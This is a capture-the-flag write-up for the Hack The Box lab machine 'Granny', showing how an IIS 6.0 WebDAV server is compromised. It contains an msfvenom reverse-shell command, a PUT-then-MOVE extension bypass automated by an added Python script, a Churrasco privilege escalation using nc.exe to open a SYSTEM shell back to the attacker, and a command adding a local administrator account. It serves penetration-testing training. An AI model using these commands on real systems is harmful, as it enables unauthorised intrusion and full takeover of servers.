# Granny HTB

## Enumeration

* We start with a full port scan plus service/OS detection: `sudo nmap -p- -A -T4 -O 10.10.10.15`. The scan shows only port 80 open, running Microsoft IIS httpd 6.0, and the http-methods script flags WebDAV methods such as PUT and MOVE as potentially risky: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-8ffd9d2e832701f8e8ae59a2d011fa5e9c04c52a%2F678e9d802489391b23ea087823544165.png?alt=media)
* Browsing to port 80 confirms that a website is hosted: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-ff04d6a65e70558070367a8f06fdf877f597146f%2F4de56f784020bd493cdc884ed934eda8.png?alt=media)
* We run dirbuster against the site and find a few hidden directories, but all of them are empty: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-aff737b03b362c0116ed5cf88e190cace1572ba3%2F2894ac828545017c7554ac988fab6b5f.png?alt=media)

## Exploitation

### Non-metasploit

* We confirm with davtest that the risky WebDAV methods flagged by nmap are actually usable: it creates a test directory, uploads test files with PUT, and then reports which of them the server executes when requested: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-d3b094ced7f369eb76f66e66f7ff8acd7df37026%2Fc61997cae39eede6e853037e2b083b49.png?alt=media)
* Only .txt and .html uploads are accepted and served back; a direct PUT of an .aspx file is rejected. The extension check is applied on upload, not on rename, so we generate an .aspx reverse shell with msfvenom and rename it to .txt before uploading: `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.25 LPORT=1234 -f aspx >reverse.aspx` followed by `mv reverse.aspx reverse.txt` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-88d33697e2617846155d47bf59bb55a62d648af8%2Ff37bba16e9e34c034804553b7d56d2ca.png?alt=media)
* We open a WebDAV session with cadaver (`cadaver 10.10.10.15`), upload the file with `put reverse.txt`, and rename it on the server with `move reverse.txt reverse.aspx`. After the MOVE the file sits in the web root with an executable ASP.NET extension: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-e15e6282d01a8208f7709d85e3cec87b3edf290a%2F668b8e6a614bb6d2809e59f1e5f9e719.png?alt=media)
* With a listener running (`nc -nlvp 1234`) we browse to http://10.10.10.15/reverse.aspx; IIS executes the page and we get a shell: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-b486837be1e3964b71a98ce2d667081019e6f9fd%2F28ca2624a2179607caf213cc9aadd3e9.png?alt=media)
* To escalate privileges we use Churrasco from <https://github.com/Re4son/Churrasco>, a token-kidnapping exploit for Windows Server 2003. We upload churrasco.exe and nc.exe the same way as the web shell, start a second listener with `nc -nlvp 4444`, and from the low-privilege shell run `churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe 10.10.14.25 4444 -e cmd.exe"` ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-a76b7280d7ab5d6e00fdaf0ba068d07339f600d7%2F22bc0f914d1eb59b601fa31228af87f9.png?alt=media)
* Alternatively, Churrasco can be used to add a local administrator instead of spawning a shell: `churrasco.exe -d "net user hacker hacker /add && net localgroup Administrators hacker /add"`
* The command runs with the hijacked SYSTEM token, so the callback gives us a SYSTEM shell (the Windows equivalent of root): ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-617b217e5073d5c5b241f6beaf153fc0a42f66fb%2F12bad755152eb233a29ccd78fd2e99db.png?alt=media)
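The PUT-then-MOVE trick above is the whole bypass, so it is worth seeing the raw WebDAV exchange that cadaver hides. The script below is an added example, not code from the writeup: it reproduces the `put` / `move` steps with plain HTTP requests (`Destination` is a full URL, as WebDAV requires), checks the status codes, and defaults to a dry run that only records the requests it would send. The host, file names and the IIS behaviour are the writeup's; `WebDavClient`, `RecordingConnection`, `recording_factory` and the `--live` flag are names invented for this example.

```python
"""Added example: stage a payload as .txt over WebDAV, then MOVE it to .aspx.

Not the writeup's code.  Host/port/file names follow the Granny writeup;
RecordingConnection is a constructed stand-in for offline dry runs.
"""
import http.client
import sys
from types import SimpleNamespace
from urllib.parse import quote


class RecordingConnection:
    """Constructed stand-in for http.client.HTTPConnection: records each
    request into `log` and answers all of them with `status`."""

    def __init__(self, log, status=201):
        self.log = log
        self.status = status

    def request(self, method, path, body=None, headers=None):
        self.log.append((method, path, dict(headers or {}), body))

    def getresponse(self):
        return SimpleNamespace(status=self.status, read=lambda: b"")

    def close(self):
        pass


def recording_factory(log, status=201):
    """Connection factory that hands out RecordingConnections (dry-run mode)."""
    return lambda: RecordingConnection(log, status)


class WebDavClient:
    def __init__(self, host, port=80, conn_factory=None):
        self.host = host
        self.port = port
        # conn_factory is an injection point for dry runs; None means real HTTP.
        self._factory = conn_factory or (
            lambda: http.client.HTTPConnection(host, port, timeout=15))

    def _base_url(self):
        port = "" if self.port == 80 else f":{self.port}"
        return f"http://{self.host}{port}"

    def _request(self, method, path, body=None, headers=None):
        conn = self._factory()
        try:
            conn.request(method, path, body=body, headers=headers or {})
            resp = conn.getresponse()
            resp.read()
            return resp.status
        finally:
            conn.close()

    def put(self, remote_path, data):
        """PUT raw bytes. IIS on this box accepts this only for some extensions."""
        status = self._request("PUT", remote_path, body=data,
                               headers={"Content-Type": "text/plain"})
        if status not in (200, 201, 204):
            raise RuntimeError(f"PUT {remote_path} rejected: HTTP {status}")
        return status

    def move(self, src_path, dst_path, overwrite=True):
        """MOVE is a server-side rename; Destination must be an absolute URL."""
        headers = {"Destination": self._base_url() + dst_path,
                   "Overwrite": "T" if overwrite else "F"}
        status = self._request("MOVE", src_path, headers=headers)
        if status not in (201, 204):
            raise RuntimeError(f"MOVE {src_path} -> {dst_path} rejected: HTTP {status}")
        return status

    def upload_via_rename(self, data, final_name, staging_ext=".txt"):
        """Upload under an allowed extension, then rename to the blocked one.
        Returns the final server path of the payload."""
        stem = final_name.rsplit(".", 1)[0]
        staging = "/" + quote(stem + staging_ext)
        final = "/" + quote(final_name)
        self.put(staging, data)
        self.move(staging, final)
        return final

    def trigger(self, path):
        """GET the page so IIS executes it. Against the real box this call does
        not return until the reverse shell exits, so have nc listening first."""
        return self._request("GET", path)


if __name__ == "__main__":
    log = []
    live = "--live" in sys.argv          # dry run unless explicitly asked
    client = WebDavClient("10.10.10.15",
                          conn_factory=None if live else recording_factory(log))
    try:
        with open("reverse.txt", "rb") as f:   # msfvenom output renamed as in the writeup
            payload = f.read()
    except FileNotFoundError:
        payload = b"<%-- constructed placeholder, not a real payload --%>"
    page = client.upload_via_rename(payload, "reverse.aspx")
    for method, path, headers, _ in log:
        print(method, path, headers)
    print("payload at", page, "- browse to it with nc -nlvp 1234 listening")
```

Run it without arguments to see the two requests it would send; with `--live` it talks to 10.10.10.15 and you then request `/reverse.aspx` yourself (or call `trigger`) once the listener is up. The same `put` + `move` pair is how churrasco.exe and nc.exe can be staged if the server refuses a direct upload of their extension.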

### Metasploit

* We start Metasploit and search for exploits matching the IIS 6.0 banner from the nmap scan; running the matching module gives us a meterpreter shell: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-c19002cf8ebb7bf2c3753225d7680d68f7343386%2Fbc9f10516acc3ce75146b70c48877944.png?alt=media)
* We list the running processes with `ps`: ![](https://2519178678-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuE2sPgM0QY6KfiTIG8Vs%2Fuploads%2Fgit-blob-dc07526f43ac1059c533c542aa03b00c89b9a3e8%2Fc6deac7ba1aa16e85895e2058e1eeaca.png?alt=media)
* We migrate to PID 1964 (taken from the `ps` output) so that the session runs from a more stable process before we try to escalate.
* We then run the local exploit suggester (`post/multi/recon/local_exploit_suggester`), pick one of the privilege escalation modules it recommends, and get a SYSTEM shell. These are standard Metasploit steps, so we do not go into further detail.
